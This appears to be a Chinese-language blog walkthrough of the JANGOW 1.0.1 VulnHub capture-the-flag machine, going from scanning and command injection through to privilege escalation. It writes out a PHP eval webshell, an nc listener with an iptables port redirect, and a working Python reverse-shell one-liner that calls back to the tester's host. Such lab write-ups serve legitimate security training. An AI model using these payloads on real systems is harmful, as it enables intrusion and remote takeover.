靶机下载地址
JANGOW: 1.0.1 < 点我下载
开始打靶
IP发现
nmap扫描网段发现靶机ip:192.168.111.140
端口发现
对靶机进行常规端口扫描
访问网站
访问80端口发现是个目录遍历:http://192.168.111.140/
点击 site目录进入一个wordpress搭建的站点
由于黑盒测试的习惯,到处点点,发现可疑接口:http://192.168.111.140/site/busque.php?buscar=
对变量buscar进行测试,输入1没回显,尝试输入id,得到回显
该接口存在任意命令执行漏洞(RCE)
输入 ls 获取当前接口所在目录:site目录
写入webshell
写入一句话木马:echo '<?php @eval($_POST["spmonkey"]);?>' > shell.php,输入 ls 确认是否写入成功
写入成功,蚁剑连接,发现连接失败,改一下payload重新写入:echo '<?php @eval($_POST["spmonkey"]);' > shell.php,重新连接,连接成功
在普通用户目录下发现一个user.txt
打开是一串md5
去解密发现是空密码
不知道有啥用。。。
由于蚁剑无法回显一些报错或者输出,这里用nc反弹shell,但是试了多个方法都没反弹成功,写脚本测试一下端口是不是被限制了。
kali设置防火墙规则:iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234,然后监听1234端口:nc -lvvp 1234
目标主机创建sh脚本:
赋予权限并运行,静心等待(这全端口好慢啊~~~),脚本运行过程中会发现有个连接是连接成功的。
查看输出文件out.txt看看是哪个端口连接成功了。
因为对防火墙做了端口绑定,所以kali直接监听1234端口即可,目标主机连接kali的443端口即可反弹shell。
python反弹shell:python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
内核信息
提权
是ubuntu 16.04,查找相关漏洞利用
利用蚁剑上传
使用gcc编译
给它赋值权限并运行即提权成功
查看root目录,发现有个txt文件,打开发现也是一串md5,解密依然是空密码,估计这两个md5就是flag了
完成。
知识点归纳
1、IP发现 2、端口扫描 3、黑盒测试 4、RCE利用 5、木马连接 6、nc反弹shell 7、权限提升
标签:发现,shell,1.0,socket,--,写入,端口,vulnhub,连接 From: https://www.cnblogs.com/spmonkey/p/17077349.html